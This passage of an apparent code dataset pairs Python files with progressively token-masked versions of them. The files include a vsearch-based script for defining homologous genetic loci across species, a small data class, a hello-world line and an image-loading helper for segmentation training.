"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n <function token>\n <function token>\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n <function token>\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n <function token>\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n <function token>\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n <function token>\n <function token>\n <function token>\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n<class token>\n<code token>\n<docstring token>\n<code token>\n<class token>\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,885 | 849689552319b1fa2e1fc9d68036d4d59e377876 | import re
import subprocess
import os
import argparse
import random
import string
import sys
import pandas as pd
parser = argparse.ArgumentParser(description="Define homologous loci across species.")
parser.add_argument('--dir', help="Directory for which to run.")
parser.add_argument('--genus', help="Genus for which to run.")
args = parser.parse_args()
dir = args.dir
genus = args.genus
c_file = '/Volumes/heloderma4/sonal/eco_IBD_oz/data/clustering/Ctenotus_Lerista.clustering.revised.csv'
d = pd.read_csv(c_file)
d = d[d.GMYC_RAxML2.notnull()]
clusters = d[d.GMYC_RAxML2.str.contains(genus)].GMYC_RAxML2.unique()
files = ['%s%s.fa' % (dir, cl) for cl in clusters]
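# minimum fractional identity for two loci to be considered homologous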
WCLUST = 0.8
def create_starter(dir, file, genus, ix):
homhash = {}
starting = '%s%s.tmp.fa' % (dir, genus)
f = open(file, 'r')
o = open(starting, 'w')
for l in f:
if re.search('>', l):
id = re.search('>(\S+)', l).group(1)
newid = '%s_%s' % (genus, ix)
homhash[newid] = {}
homhash[newid][id] = '+'
seq = f.next().rstrip()
o.write('>%s\n%s\n' % (newid, seq))
ix += 1
f.close()
o.close()
return starting, homhash, ix
def vsearch(dir, tmpfile, file, genus, num):
out = '%s%s_%s_search' % (dir, genus, num)
subprocess.call("vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4" % (file, tmpfile, out, WCLUST), shell=True)
return out
def create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):
matches1 = {}
matches2 = {}
f = open(results, 'r')
for l in f:
d = re.split('\s+', l.rstrip())
# is this step necessary?
# makes sure it is 1 to 1
if d[1] not in matches1 and d[0] not in matches2:
matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand': d[4]}
matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand': d[4]}
elif d[0] in matches2 and d[1] not in matches1:
if float(d[3]) > matches2[d[0]]['perc']:
				matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand': d[4]}
				matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand': d[4]}
f.close()
os.remove(results)
for c in matches2:
homhash[matches2[c]['match']][c] = matches2[c]['strand']
f = open(file, 'r')
o = open(tmpfile, 'a')
for l in f:
if re.search('>', l):
id = re.search('>(\S+)', l.rstrip()).group(1)
seq = f.next().rstrip()
if id not in matches2:
new_id = '%s_%s' % (genus, ix)
ix += 1
homhash[new_id] = {}
homhash[new_id][id] = '+'
o.write('>%s\n%s\n' % (new_id, seq))
f.close()
o.close()
return (tmpfile, homhash, ix)
ix = 0
tmpfile, homhash, ix = create_starter(dir, files[0], genus, ix)
for num, file in enumerate(files[1:]):
results = vsearch(dir, tmpfile, file, genus, num)
(tmpfile, homhash, ix) = create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix)
os.remove(tmpfile)
o = open('%s%s_homology_across_species.txt' % (dir, genus), 'w')
o.write('contig\tmatches\tnumMatches\n')
for c, matches in homhash.items():
matches = ['%s:%s' % (match, homhash[c][match]) for match in matches]
o.write('%s\t%s\t%s\n' % (c, ','.join(matches), len(matches)))
o.close()
| [
"import re\nimport subprocess\nimport os\nimport argparse\nimport random\nimport string\nimport sys\nimport pandas as pd\n\nparser = argparse.ArgumentParser(description=\"Define homologous loci across species.\")\nparser.add_argument('--dir', help=\"Directory for which to run.\")\nparser.add_argument('--genus', help=\"Genus for which to run.\")\n\nargs = parser.parse_args()\ndir = args.dir\ngenus = args.genus\n\nc_file = '/Volumes/heloderma4/sonal/eco_IBD_oz/data/clustering/Ctenotus_Lerista.clustering.revised.csv'\nd = pd.read_csv(c_file)\nd = d[d.GMYC_RAxML2.notnull()]\nclusters = d[d.GMYC_RAxML2.str.contains(genus)].GMYC_RAxML2.unique()\n\nfiles = ['%s%s.fa' % (dir, cl) for cl in clusters]\nWCLUST = 0.8\n\ndef create_starter(dir, file, genus, ix):\n\thomhash = {}\n\n\tstarting = '%s%s.tmp.fa' % (dir, genus)\n\tf = open(file, 'r')\n\to = open(starting, 'w')\n\tfor l in f:\n\t\tif re.search('>', l):\n\t\t\tid = re.search('>(\\S+)', l).group(1)\n\t\t\tnewid = '%s_%s' % (genus, ix)\n\n\t\t\thomhash[newid] = {}\n\t\t\thomhash[newid][id] = '+'\n\t\t\t\n\t\t\tseq = f.next().rstrip()\n\t\t\to.write('>%s\\n%s\\n' % (newid, seq))\n\t\t\tix += 1\n\tf.close()\n\to.close()\n\n\treturn starting, homhash, ix\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n\tout = '%s%s_%s_search' % (dir, genus, num)\n\tsubprocess.call(\"vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4\" % (file, tmpfile, out, WCLUST), shell=True)\n\n\treturn out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n\tmatches1 = {}\n\tmatches2 = {}\n\n\tf = open(results, 'r')\n\tfor l in f:\n\t\td = re.split('\\s+', l.rstrip())\n\t\t# is this step necessary?\n\t\t# makes sure it is 1 to 1\n\t\tif d[1] not in matches1 and d[0] not in matches2:\n\t\t\tmatches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand': d[4]}\n\t\t\tmatches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand': d[4]}\n\t\telif d[0] in matches2 and d[1] not in matches1:\n\t\t\tif float(d[3]) > matches2[d[0]]['perc']:\n \tmatches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand': d[4]}\n \tmatches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand': d[4]}\n\tf.close()\n\tos.remove(results)\n\n\tfor c in matches2:\n\t\thomhash[matches2[c]['match']][c] = matches2[c]['strand']\n\n\tf = open(file, 'r')\n\to = open(tmpfile, 'a')\n\tfor l in f:\n\t\tif re.search('>', l):\n\t\t\tid = re.search('>(\\S+)', l.rstrip()).group(1)\n\t\t\tseq = f.next().rstrip()\n\t\t\tif id not in matches2:\n\t\t\t\tnew_id = '%s_%s' % (genus, ix)\n\t\t\t\tix += 1\n\n\t\t\t\thomhash[new_id] = {}\t\n\t\t\t\thomhash[new_id][id] = '+'\n\t\t\n\t\t\t\to.write('>%s\\n%s\\n' % (new_id, seq))\n\tf.close()\n\to.close()\n\n\treturn (tmpfile, homhash, ix)\n\nix = 0\ntmpfile, homhash, ix = create_starter(dir, files[0], genus, ix)\nfor num, file in enumerate(files[1:]):\n\tresults = vsearch(dir, tmpfile, file, genus, num)\n\t(tmpfile, homhash, ix) = create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix)\nos.remove(tmpfile)\n\no = open('%s%s_homology_across_species.txt' % (dir, genus), 'w')\no.write('contig\\tmatches\\tnumMatches\\n')\nfor c, matches in homhash.items():\n\tmatches = ['%s:%s' % (match, homhash[c][match]) for match in matches]\n\to.write('%s\\t%s\\t%s\\n' % (c, ','.join(matches), len(matches)))\no.close()\n\n\n",
"import re\nimport subprocess\nimport os\nimport argparse\nimport random\nimport string\nimport sys\nimport pandas as pd\nparser = argparse.ArgumentParser(description=\n 'Define homologous loci across species.')\nparser.add_argument('--dir', help='Directory for which to run.')\nparser.add_argument('--genus', help='Genus for which to run.')\nargs = parser.parse_args()\ndir = args.dir\ngenus = args.genus\nc_file = (\n '/Volumes/heloderma4/sonal/eco_IBD_oz/data/clustering/Ctenotus_Lerista.clustering.revised.csv'\n )\nd = pd.read_csv(c_file)\nd = d[d.GMYC_RAxML2.notnull()]\nclusters = d[d.GMYC_RAxML2.str.contains(genus)].GMYC_RAxML2.unique()\nfiles = [('%s%s.fa' % (dir, cl)) for cl in clusters]\nWCLUST = 0.8\n\n\ndef create_starter(dir, file, genus, ix):\n homhash = {}\n starting = '%s%s.tmp.fa' % (dir, genus)\n f = open(file, 'r')\n o = open(starting, 'w')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l).group(1)\n newid = '%s_%s' % (genus, ix)\n homhash[newid] = {}\n homhash[newid][id] = '+'\n seq = f.next().rstrip()\n o.write('>%s\\n%s\\n' % (newid, seq))\n ix += 1\n f.close()\n o.close()\n return starting, homhash, ix\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n out = '%s%s_%s_search' % (dir, genus, num)\n subprocess.call(\n 'vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4'\n % (file, tmpfile, out, WCLUST), shell=True)\n return out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\nix = 0\ntmpfile, homhash, ix = create_starter(dir, files[0], genus, ix)\nfor num, file in enumerate(files[1:]):\n results = vsearch(dir, tmpfile, file, genus, num)\n tmpfile, homhash, ix = create_new_tmp(dir, tmpfile, file, results,\n homhash, genus, ix)\nos.remove(tmpfile)\no = open('%s%s_homology_across_species.txt' % (dir, genus), 'w')\no.write('contig\\tmatches\\tnumMatches\\n')\nfor c, matches in homhash.items():\n matches = [('%s:%s' % (match, homhash[c][match])) for match in matches]\n o.write('%s\\t%s\\t%s\\n' % (c, ','.join(matches), len(matches)))\no.close()\n",
"<import token>\nparser = argparse.ArgumentParser(description=\n 'Define homologous loci across species.')\nparser.add_argument('--dir', help='Directory for which to run.')\nparser.add_argument('--genus', help='Genus for which to run.')\nargs = parser.parse_args()\ndir = args.dir\ngenus = args.genus\nc_file = (\n '/Volumes/heloderma4/sonal/eco_IBD_oz/data/clustering/Ctenotus_Lerista.clustering.revised.csv'\n )\nd = pd.read_csv(c_file)\nd = d[d.GMYC_RAxML2.notnull()]\nclusters = d[d.GMYC_RAxML2.str.contains(genus)].GMYC_RAxML2.unique()\nfiles = [('%s%s.fa' % (dir, cl)) for cl in clusters]\nWCLUST = 0.8\n\n\ndef create_starter(dir, file, genus, ix):\n homhash = {}\n starting = '%s%s.tmp.fa' % (dir, genus)\n f = open(file, 'r')\n o = open(starting, 'w')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l).group(1)\n newid = '%s_%s' % (genus, ix)\n homhash[newid] = {}\n homhash[newid][id] = '+'\n seq = f.next().rstrip()\n o.write('>%s\\n%s\\n' % (newid, seq))\n ix += 1\n f.close()\n o.close()\n return starting, homhash, ix\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n out = '%s%s_%s_search' % (dir, genus, num)\n subprocess.call(\n 'vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4'\n % (file, tmpfile, out, WCLUST), shell=True)\n return out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\nix = 0\ntmpfile, homhash, ix = create_starter(dir, files[0], genus, ix)\nfor num, file in enumerate(files[1:]):\n results = vsearch(dir, tmpfile, file, genus, num)\n tmpfile, homhash, ix = create_new_tmp(dir, tmpfile, file, results,\n homhash, genus, ix)\nos.remove(tmpfile)\no = open('%s%s_homology_across_species.txt' % (dir, genus), 'w')\no.write('contig\\tmatches\\tnumMatches\\n')\nfor c, matches in homhash.items():\n matches = [('%s:%s' % (match, homhash[c][match])) for match in matches]\n o.write('%s\\t%s\\t%s\\n' % (c, ','.join(matches), len(matches)))\no.close()\n",
"<import token>\n<assignment token>\nparser.add_argument('--dir', help='Directory for which to run.')\nparser.add_argument('--genus', help='Genus for which to run.')\n<assignment token>\n\n\ndef create_starter(dir, file, genus, ix):\n homhash = {}\n starting = '%s%s.tmp.fa' % (dir, genus)\n f = open(file, 'r')\n o = open(starting, 'w')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l).group(1)\n newid = '%s_%s' % (genus, ix)\n homhash[newid] = {}\n homhash[newid][id] = '+'\n seq = f.next().rstrip()\n o.write('>%s\\n%s\\n' % (newid, seq))\n ix += 1\n f.close()\n o.close()\n return starting, homhash, ix\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n out = '%s%s_%s_search' % (dir, genus, num)\n subprocess.call(\n 'vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4'\n % (file, tmpfile, out, WCLUST), shell=True)\n return out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\n<assignment token>\nfor num, file in enumerate(files[1:]):\n results = vsearch(dir, tmpfile, file, genus, num)\n tmpfile, homhash, ix = create_new_tmp(dir, tmpfile, file, results,\n homhash, genus, ix)\nos.remove(tmpfile)\n<assignment token>\no.write('contig\\tmatches\\tnumMatches\\n')\nfor c, matches in homhash.items():\n matches = [('%s:%s' % (match, homhash[c][match])) for match in matches]\n o.write('%s\\t%s\\t%s\\n' % (c, ','.join(matches), len(matches)))\no.close()\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef create_starter(dir, file, genus, ix):\n homhash = {}\n starting = '%s%s.tmp.fa' % (dir, genus)\n f = open(file, 'r')\n o = open(starting, 'w')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l).group(1)\n newid = '%s_%s' % (genus, ix)\n homhash[newid] = {}\n homhash[newid][id] = '+'\n seq = f.next().rstrip()\n o.write('>%s\\n%s\\n' % (newid, seq))\n ix += 1\n f.close()\n o.close()\n return starting, homhash, ix\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n out = '%s%s_%s_search' % (dir, genus, num)\n subprocess.call(\n 'vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4'\n % (file, tmpfile, out, WCLUST), shell=True)\n return out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n out = '%s%s_%s_search' % (dir, genus, num)\n subprocess.call(\n 'vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4'\n % (file, tmpfile, out, WCLUST), shell=True)\n return out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,886 | eedd29223dfefc4561b33e8cdbe5c13e2938b170 | class Indicator:
name = ''
description = ''
source = ''
sourcenote = ''
note = ''
datasource = ''
url = ''
source_metadata = ''
data = {}
def as_json(self):
return dict(
name=self.name,
description=self.description,
source=self.source,
sourcenote=self.sourcenote,
note=self.note,
datasource=self.datasource,
url=self.url,
source_metadata = self.source_metadata,
data=self.data)
| [
"class Indicator:\r\n\tname = ''\r\n\tdescription = ''\r\n\tsource = ''\r\n\tsourcenote = ''\r\n\tnote = ''\r\n\tdatasource = ''\r\n\turl = ''\r\n\tsource_metadata = ''\r\n\tdata = {}\r\n\r\n\tdef as_json(self):\r\n\t\treturn dict(\r\n\t\t\tname=self.name,\r\n\t\t\tdescription=self.description,\r\n\t\t\tsource=self.source,\r\n\t\t\tsourcenote=self.sourcenote,\r\n\t\t\tnote=self.note,\r\n\t\t\tdatasource=self.datasource,\r\n\t\t\turl=self.url,\r\n\t\t\tsource_metadata = self.source_metadata,\r\n\t\t\tdata=self.data)\r\n",
"class Indicator:\n name = ''\n description = ''\n source = ''\n sourcenote = ''\n note = ''\n datasource = ''\n url = ''\n source_metadata = ''\n data = {}\n\n def as_json(self):\n return dict(name=self.name, description=self.description, source=\n self.source, sourcenote=self.sourcenote, note=self.note,\n datasource=self.datasource, url=self.url, source_metadata=self.\n source_metadata, data=self.data)\n",
"class Indicator:\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def as_json(self):\n return dict(name=self.name, description=self.description, source=\n self.source, sourcenote=self.sourcenote, note=self.note,\n datasource=self.datasource, url=self.url, source_metadata=self.\n source_metadata, data=self.data)\n",
"class Indicator:\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n",
"<class token>\n"
] | false |
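As a quick illustration of how the Indicator class in record 99,886 might be used, here is a minimal sketch; it assumes the class above is importable (the module name indicators is made up) and all field values are placeholders. Note that the class-level data = {} dict is shared between instances until an instance assigns its own data attribute.

import json
from indicators import Indicator  # hypothetical module holding the class above

indicator = Indicator()
indicator.name = 'population'                          # placeholder values
indicator.description = 'Total population per region'
indicator.source = 'Example Statistics Office'
indicator.data = {'2020': 1234, '2021': 1250}          # shadows the shared class-level dict

# as_json() mirrors the attributes into a plain dict, so it serializes directly.
print(json.dumps(indicator.as_json(), indent=2))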
99,887 | b43fda6d4779962f090f782ef65bdda63804fd1d | # say hello to everyone
print('Hello Everyone!')
| [
"# say hello to everyone\nprint('Hello Everyone!')\n",
"print('Hello Everyone!')\n",
"<code token>\n"
] | false |
99,888 | c290c0444619b39e322347d3adbac6a3e6ee779f | import numpy as np
import cv2
import time
import os, sys
import random as rd
def load_path_list(image_path, gt_path, batch_size, train = True):
"""
    Load all image paths. There are two cases:
    if train == True, load the training image list and split its
    size into a training part and a validation part;
    if train == False, load the test image list without computing sizes.
path_list : Data File Name List
Train_size : int
Validation_size : int
"""
if train:
print("Image Load Started..")
path_list = os.listdir(gt_path)
image_size = len(path_list)
Train_size = image_size // batch_size * batch_size
Validation_size = image_size - Train_size
if Validation_size < 10:
Train_size -= batch_size
Validation_size += batch_size
print("Train data size : ", Train_size)
print("Validation data size : ", Validation_size)
else:
path_list = os.listdir(gt_path)
Train_size = 0
Validation_size = 0
print("Test data size : ", len(path_list))
rd.shuffle(path_list)
return path_list, Train_size, Validation_size
def load_labels(label_path):
"""
    Load labels for VOC2012. Labels must be provided in a txt file formatted like label.txt.
    The label path can be changed when running the training code via --label_path.
    label : { label name : label color}
index : [ [label color], [label color]]
"""
with open(label_path, "r") as f:
lines = f.readlines()
label = {}
index = []
for i, line in enumerate(lines):
sp = line.split()
label[sp[0]] = [int(sp[1]),int(sp[2]),int(sp[3])]
index.append([int(sp[3]),int(sp[2]),int(sp[1])])
return label, index
def make_label_map(path, label_list):
"""
    Convert a 3-channel ground-truth image into a single-channel label map.
    Colors that are not found in label_list fall back to label 0.
Output : [N, H, W]
"""
img = []
for name in path:
now = np.zeros((224,224))
im = cv2.resize(cv2.imread(name), (224,224)).tolist()
for y, i in enumerate(im):
for x, j in enumerate(i):
try:
now[y, x] = label_list.index(j)
except ValueError:
now[y, x] = 0
img.append(now)
return img
def image_load_resize(path):
"""
    Resize each image to a 224 x 224 3-channel image.
Output : [N, H, W, C]
"""
img = []
for name in path:
img.append(cv2.resize(cv2.imread(name), (224,224)))
return img
def batch(img_path, gt_path,img_list, batch, total_size, label_list):
"""
Batch Main function
Return image and Label Map
Output : [N, H, W, C], [N, H, W]
"""
image_list = [os.path.join(img_path, i) for i in img_list]
gt_list = [os.path.join(gt_path,i) for i in img_list]
for i in range(0, total_size, batch):
yield image_load_resize(image_list[i:i+batch]), make_label_map(gt_list[i:i+batch], label_list)
| [
